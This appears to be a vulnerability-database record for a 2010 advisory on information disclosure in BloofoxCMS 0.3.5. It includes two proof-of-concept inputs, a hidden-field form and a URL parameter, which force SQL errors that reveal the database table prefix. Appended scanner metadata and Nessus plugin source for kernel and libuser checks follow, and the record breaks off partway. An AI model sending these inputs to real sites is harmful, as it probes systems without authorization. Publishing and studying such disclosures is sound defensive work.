BloofoxCMS v0.3.5 Information Disclosure Vulnerabilities
2010-10-28T00:00:00
ID 1337DAY-ID-14609 Type zdt Reporter High-Tech Bridge Modified 2010-10-28T00:00:00
Description
Exploit for php platform in category web applications
========================================================
BloofoxCMS v0.3.5 Information Disclosure Vulnerabilities
========================================================
Reference: http://www.htbridge.ch/advisory/information_disclosure_in_bloofoxcms_1.html
Product: BloofoxCMS
Vendor: bloofox.com ( http://bloofox.com/ )
Vulnerable Version: 0.3.5 and probably prior versions
Vendor Notification: 13 October 2010
Vulnerability Type: Information Disclosure
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in username variable, it's possible to generate an sql query error that will reveal the database tables prefix.
The following PoC is available:
<form action="http://[host]/index.php?login=true" method="post">
<input name="username" type="hidden" value="\\">
<input name="password" type="hidden" value="password">
<input value="Login" name="login" type="submit">
</form>
Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in key variable, it's possible to generate an sql query error that will reveal the database tables prefix.
The following PoC is available:
http://[host]/index.php?key=\\
# 0day.today [2018-01-05] #
{"hash": "a306e3dce758fb98ce7a5b0b59ca03a145373187a767031fb6c654e499e827af", "id": "1337DAY-ID-14609", "lastseen": "2018-01-05T13:10:33", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "79cb2cf22afdf098db2a0ef152511756", "key": "href"}, {"hash": "50eb5ea25397aafb4ce421dc1848c308", "key": "modified"}, {"hash": "50eb5ea25397aafb4ce421dc1848c308", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e14423614d4312fc3680dca7e427dd8e", "key": "reporter"}, {"hash": "7ebb8dbb9247bad3f36db569faa4f229", "key": "sourceData"}, {"hash": "b7fc471be30d18af75c9b4cb16f95c61", "key": "sourceHref"}, {"hash": "47a27165374c1b8065d885e14984eef5", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE", "modified": "2018-01-05T13:10:33"}, "dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:44633"]}, {"type": "zdt", "idList": ["1337DAY-ID-30355"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147599"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/LOCAL/LIBUSER_ROOTHELPER_PRIV_ESC"]}, {"type": "nessus", "idList": ["F5_BIGIP_SOL05770600.NASL", "DEBIAN_DLA-468.NASL", "OPENSUSE-2015-529.NASL", "SL_20150723_LIBUSER_ON_SL6_X.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DLA-468-1:4512C"]}, {"type": "f5", "idList": ["F5:K05770600", "SOL05770600"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310130100", "OPENVAS:1361412562310123073", "OPENVAS:1361412562310123048", "OPENVAS:1361412562310850683", "OPENVAS:1361412562310120278", "OPENVAS:1361412562310882230", "OPENVAS:1361412562310869833"]}, {"type": "cve", "idList": ["CVE-2015-3246", "CVE-2015-3245"]}], "modified": "2018-01-05T13:10:33"}, "vulnersScore": 5.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/14609", "description": "Exploit for php platform in category web applications", "title": "BloofoxCMS v0.3.5 Information Disclosure Vulnerabilities", "history": [{"bulletin": {"hash": "17d3d90fe56338fb313bd51d6f977776a51bc68e1cf57e02d4fb447f71442259", "id": "1337DAY-ID-14609", "lastseen": "2016-04-19T01:11:23", "enchantments": {"score": {"value": 6.0, "modified": "2016-04-19T01:11:23"}}, "hashmap": [{"hash": "cc572fd46f1127cc63d2ff7bb18e77db", "key": "sourceHref"}, {"hash": "3e6d2856766c6f5b08027b55f9ff5258", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "7f7ba31b552677deb7e09c23bc5f74aa", "key": "sourceData"}, {"hash": "47a27165374c1b8065d885e14984eef5", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "e14423614d4312fc3680dca7e427dd8e", "key": "reporter"}, {"hash": "50eb5ea25397aafb4ce421dc1848c308", "key": "published"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "50eb5ea25397aafb4ce421dc1848c308", "key": "modified"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/14609", "description": "Exploit for php platform in category web applications", "viewCount": 0, "title": "BloofoxCMS v0.3.5 Information Disclosure Vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "========================================================\r\nBloofoxCMS v0.3.5 Information Disclosure Vulnerabilities\r\n========================================================\r\n\r\nReference: http://www.htbridge.ch/advisory/information_disclosure_in_bloofoxcms_1.html\r\nProduct: BloofoxCMS\r\nVendor: bloofox.com ( http://bloofox.com/ )\r\nVulnerable Version: 0.3.5 and probably prior versions\r\nVendor Notification: 13 October 2010\r\nVulnerability Type: Information Disclosure\r\nStatus: Not Fixed, Vendor Alerted, Awaiting Vendor Response\r\nRisk level: Low\r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)\r\n \r\nVulnerability Details:\r\nThe vulnerability exists due to failure in the \"/index.php\" script to properly sanitize user-supplied input in username variable, it's possible to generate an sql query error that will reveal the database tables prefix.\r\n \r\nThe following PoC is available:\r\n \r\n \r\n<form action=\"http://[host]/index.php?login=true\" method=\"post\">\r\n<input name=\"username\" type=\"hidden\" value=\"\\\\\">\r\n<input name=\"password\" type=\"hidden\" value=\"password\">\r\n<input value=\"Login\" name=\"login\" type=\"submit\">\r\n</form>\r\n \r\nVulnerability Details:\r\nThe vulnerability exists due to failure in the \"/index.php\" script to properly sanitize user-supplied input in key variable, it's possible to generate an sql query error that will reveal the database tables prefix.\r\n \r\nThe following PoC is available:\r\n \r\n \r\nhttp://[host]/index.php?key=\\\\\r\n\r\n\n\n# 0day.today [2016-04-19] #", "published": "2010-10-28T00:00:00", "references": [], "reporter": "High-Tech Bridge", "modified": "2010-10-28T00:00:00", "href": "http://0day.today/exploit/description/14609"}, "lastseen": "2016-04-19T01:11:23", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "========================================================\r\nBloofoxCMS v0.3.5 Information Disclosure Vulnerabilities\r\n========================================================\r\n\r\nReference: http://www.htbridge.ch/advisory/information_disclosure_in_bloofoxcms_1.html\r\nProduct: BloofoxCMS\r\nVendor: bloofox.com ( http://bloofox.com/ )\r\nVulnerable Version: 0.3.5 and probably prior versions\r\nVendor Notification: 13 October 2010\r\nVulnerability Type: Information Disclosure\r\nStatus: Not Fixed, Vendor Alerted, Awaiting Vendor Response\r\nRisk level: Low\r\nCredit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)\r\n \r\nVulnerability Details:\r\nThe vulnerability exists due to failure in the \"/index.php\" script to properly sanitize user-supplied input in username variable, it's possible to generate an sql query error that will reveal the database tables prefix.\r\n \r\nThe following PoC is available:\r\n \r\n \r\n<form action=\"http://[host]/index.php?login=true\" method=\"post\">\r\n<input name=\"username\" type=\"hidden\" value=\"\\\\\">\r\n<input name=\"password\" type=\"hidden\" value=\"password\">\r\n<input value=\"Login\" name=\"login\" type=\"submit\">\r\n</form>\r\n \r\nVulnerability Details:\r\nThe vulnerability exists due to failure in the \"/index.php\" script to properly sanitize user-supplied input in key variable, it's possible to generate an sql query error that will reveal the database tables prefix.\r\n \r\nThe following PoC is available:\r\n \r\n \r\nhttp://[host]/index.php?key=\\\\\r\n\r\n\n\n# 0day.today [2018-01-05] #", "published": "2010-10-28T00:00:00", "references": [], "reporter": "High-Tech Bridge", "modified": "2010-10-28T00:00:00", "href": "https://0day.today/exploit/description/14609"}
{"nessus": [{"lastseen": "2019-12-13T06:25:43", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - A use-after-free vulnerability was found in DCCP socket\n code affecting the Linux kernel since 2.6.16. This\n vulnerability could allow an attacker to their escalate\n privileges.(CVE-2017-8824)\n\n - The OZWPAN driver in the Linux kernel through 4.0.5\n relies on an untrusted length field during packet\n parsing, which allows remote attackers to obtain\n sensitive information from kernel memory or cause a\n denial of service (out-of-bounds read and system crash)\n via a crafted packet.(CVE-2015-4004)\n\n - Integer signedness error in the MSM V4L2 video driver\n for the Linux kernel 3.x, as used in Qualcomm\n Innovation Center (QuIC) Android contributions for MSM\n devices and other products, allows attackers to gain\n privileges or cause a denial of service (array overflow\n and memory corruption) via a crafted application that\n triggers an msm_isp_axi_create_stream\n call.(CVE-2016-2061)\n\n - A denial of service flaw was found in the way the Linux\n kernel", "modified": "2019-12-02T00:00:00", "id": "EULEROS_SA-2019-1476.NASL", "href": "https://www.tenable.com/plugins/nessus/124800", "published": "2019-05-13T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1476)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124800);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/06/27 13:33:25\");\n\n script_cve_id(\n \"CVE-2013-2895\",\n \"CVE-2013-4516\",\n \"CVE-2014-7283\",\n \"CVE-2015-2877\",\n \"CVE-2015-3636\",\n \"CVE-2015-4003\",\n \"CVE-2015-4004\",\n \"CVE-2015-8952\",\n \"CVE-2015-8964\",\n \"CVE-2016-2061\",\n \"CVE-2016-3137\",\n \"CVE-2017-17806\",\n \"CVE-2017-18193\",\n \"CVE-2017-18255\",\n \"CVE-2017-5550\",\n \"CVE-2017-8824\",\n \"CVE-2018-1092\",\n \"CVE-2018-12633\",\n \"CVE-2018-14609\",\n \"CVE-2018-8822\"\n );\n script_bugtraq_id(\n 62045,\n 63519,\n 70261,\n 74450,\n 74668\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1476)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - A use-after-free vulnerability was found in DCCP socket\n code affecting the Linux kernel since 2.6.16. This\n vulnerability could allow an attacker to their escalate\n privileges.(CVE-2017-8824)\n\n - The OZWPAN driver in the Linux kernel through 4.0.5\n relies on an untrusted length field during packet\n parsing, which allows remote attackers to obtain\n sensitive information from kernel memory or cause a\n denial of service (out-of-bounds read and system crash)\n via a crafted packet.(CVE-2015-4004)\n\n - Integer signedness error in the MSM V4L2 video driver\n for the Linux kernel 3.x, as used in Qualcomm\n Innovation Center (QuIC) Android contributions for MSM\n devices and other products, allows attackers to gain\n privileges or cause a denial of service (array overflow\n and memory corruption) via a crafted application that\n triggers an msm_isp_axi_create_stream\n call.(CVE-2016-2061)\n\n - A denial of service flaw was found in the way the Linux\n kernel's XFS file system implementation ordered\n directory hashes under certain conditions. A local\n attacker could use this flaw to corrupt the file system\n by creating directories with colliding hash values,\n potentially resulting in a system crash.(CVE-2014-7283)\n\n - It was found that the Linux kernel's ping socket\n implementation did not properly handle socket unhashing\n during spurious disconnects, which could lead to a\n use-after-free flaw. On x86-64 architecture systems, a\n local user able to create ping sockets could use this\n flaw to crash the system. On non-x86-64 architecture\n systems, a local user able to create ping sockets could\n use this flaw to escalate their privileges on the\n system.(CVE-2015-3636)\n\n - Incorrect buffer length handling was found in the\n ncp_read_kernel function in fs/ncpfs/ncplib_kernel.c in\n the Linux kernel, which could be exploited by malicious\n NCPFS servers to crash the kernel or possibly execute\n an arbitrary code.(CVE-2018-8822)\n\n - ** DISPUTED ** Kernel Samepage Merging (KSM) in the\n Linux kernel 2.6.32 through 4.x does not prevent use of\n a write-timing side channel, which allows guest OS\n users to defeat the ASLR protection mechanism on other\n guest OS instances via a Cross-VM ASL INtrospection\n (CAIN) attack. NOTE: the vendor states 'Basically if\n you care about this attack vector, disable\n deduplication.' Share-until-written approaches for\n memory conservation among mutually untrusting tenants\n are inherently detectable for information disclosure,\n and can be classified as potentially misunderstood\n behaviors rather than vulnerabilities.(CVE-2015-2877)\n\n - The tty_set_termios_ldisc() function in\n 'drivers/tty/tty_ldisc.c' in the Linux kernel before\n 4.5 allows local users to obtain sensitive information\n from kernel memory by reading a tty data\n structure.(CVE-2015-8964)\n\n - An issue was discovered in the Linux kernel through\n 4.17.2. vbg_misc_device_ioctl() in\n drivers/virt/vboxguest/vboxguest_linux.c reads the same\n user data twice with copy_from_user. The header part of\n the user data is double-fetched, and a malicious user\n thread can tamper with the critical variables\n (hdr.size_in and hdr.size_out) in the header between\n the two fetches because of a race condition, leading to\n severe kernel errors, such as buffer over-accesses.\n This bug can cause a local denial of service and\n information leakage.(CVE-2018-12633)\n\n - ** RESERVED ** This candidate has been reserved by an\n organization or individual that will use it when\n announcing a new security problem. When the candidate\n has been publicized, the details for this candidate\n will be provided.(CVE-2018-1092)\n\n - fs/f2fs/extent_cache.c in the Linux kernel, before\n 4.13, mishandles extent trees. This allows local users\n to cause a denial of service via an application with\n multiple threads.(CVE-2017-18193)\n\n - A design flaw was found in the file extended attribute\n handling of the Linux kernel's handling of cached\n attributes. Too many entries in the cache cause a soft\n lockup while attempting to iterate the cache and access\n relevant locks.(CVE-2015-8952)\n\n - Off-by-one error in the pipe_advance function in\n lib/iov_iter.c in the Linux kernel before 4.9.5 allows\n local users to obtain sensitive information from\n uninitialized heap-memory locations in opportunistic\n circumstances by reading from a pipe after an incorrect\n buffer-release decision.(CVE-2017-5550)\n\n - The HMAC implementation (crypto/hmac.c) in the Linux\n kernel, before 4.14.8, does not validate that the\n underlying cryptographic hash algorithm is unkeyed.\n This allows a local attacker, able to use the\n AF_ALG-based hash interface\n (CONFIG_CRYPTO_USER_API_HASH) and the SHA-3 hash\n algorithm (CONFIG_CRYPTO_SHA3), to cause a kernel stack\n buffer overflow by executing a crafted sequence of\n system calls that encounter a missing SHA-3\n initialization.(CVE-2017-17806)\n\n - The mp_get_count function in\n drivers/staging/sb105x/sb_pci_mp.c in the Linux kernel\n before 3.12 does not initialize a certain data\n structure, which allows local users to obtain sensitive\n information from kernel stack memory via a TIOCGICOUNT\n ioctl call.(CVE-2013-4516)\n\n - The perf_cpu_time_max_percent_handler function in\n kernel/events/core.c in the Linux kernel before 4.11\n allows local users to cause a denial of service\n (integer overflow) or possibly have unspecified other\n impact via a large value, as demonstrated by an\n incorrect sample-rate calculation.(CVE-2017-18255)\n\n - An issue was discovered in the btrfs filesystem code in\n the Linux kernel. An invalid pointer dereference in\n __del_reloc_root() in fs/btrfs/relocation.c when\n mounting a crafted btrfs image could lead to a system\n crash and a denial of service.(CVE-2018-14609)\n\n - The oz_usb_handle_ep_data function in\n drivers/staging/ozwpan/ozusbsvc1.c in the OZWPAN driver\n in the Linux kernel through 4.0.5 allows remote\n attackers to cause a denial of service (divide-by-zero\n error and system crash) via a crafted\n packet.(CVE-2015-4003)\n\n - drivers/hid/hid-logitech-dj.c in the Human Interface\n Device (HID) subsystem in the Linux kernel through\n 3.11, when CONFIG_HID_LOGITECH_DJ is enabled, allows\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and OOPS) or obtain\n sensitive information from kernel memory via a crafted\n device.(CVE-2013-2895)\n\n - drivers/usb/serial/cypress_m8.c in the Linux kernel\n before 4.5.1 allows physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a USB device without both an\n interrupt-in and an interrupt-out endpoint descriptor,\n related to the cypress_generic_port_probe and\n cypress_open functions.(CVE-2016-3137)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1476\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0934af5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T07:02:06", "bulletinFamily": "scanner", "description": "libuser before 0.56.13-8 and 0.60 before 0.60-7, as used in the\nuserhelper program in the usermode package, directly modifies\n/etc/passwd, which allows local users to cause a denial of service\n(inconsistent file state) by causing an error during the modification.\nNOTE: this issue can be combined with CVE-2015-3245 to gain\nprivileges.", "modified": "2019-12-02T00:00:00", "id": "F5_BIGIP_SOL05770600.NASL", "href": "https://www.tenable.com/plugins/nessus/91327", "published": "2016-05-26T00:00:00", "title": "F5 Networks BIG-IP : Linux libuser vulnerability (SOL05770600)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL05770600.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91327);\n script_version(\"2.15\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2015-3245\", \"CVE-2015-3246\");\n script_bugtraq_id(76021, 76022);\n script_xref(name:\"IAVA\", value:\"2015-A-0179\");\n\n script_name(english:\"F5 Networks BIG-IP : Linux libuser vulnerability (SOL05770600)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libuser before 0.56.13-8 and 0.60 before 0.60-7, as used in the\nuserhelper program in the usermode package, directly modifies\n/etc/passwd, which allows local users to cause a denial of service\n(inconsistent file state) by causing an error during the modification.\nNOTE: this issue can be combined with CVE-2015-3245 to gain\nprivileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K05770600\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL05770600.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Libuser roothelper Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/26\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL05770600\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.3.0-11.6.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.1.0\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.4.0-11.6.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.1.0\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.1.0\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"12.0.0\",\"11.0.0-11.6.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.1.0\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"12.0.0\",\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.1.0\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.0.0-11.6.1\",\"10.1.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.1.0\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"12.0.0\",\"11.3.0-11.6.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.1.0\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T06:50:33", "bulletinFamily": "scanner", "description": "Two security vulnerabilities were discovered in libuser, a library\nthat implements a standardized interface for manipulating and\nadministering user and group accounts, that could lead to a denial of\nservice or privilege escalation by local users.\n\nCVE-2015-3245 Incomplete blacklist vulnerability in the chfn function\nin libuser before 0.56.13-8 and 0.60 before 0.60-7, as used in the\nuserhelper program in the usermode package, allows local users to\ncause a denial of service (/etc/passwd corruption) via a newline\ncharacter in the GECOS field.\n\nCVE-2015-3246 libuser before 0.56.13-8 and 0.60 before 0.60-7, as used\nin the userhelper program in the usermode package, directly modifies\n/etc/passwd, which allows local users to cause a denial of service\n(inconsistent file state) by causing an error during the modification.\nNOTE: this issue can 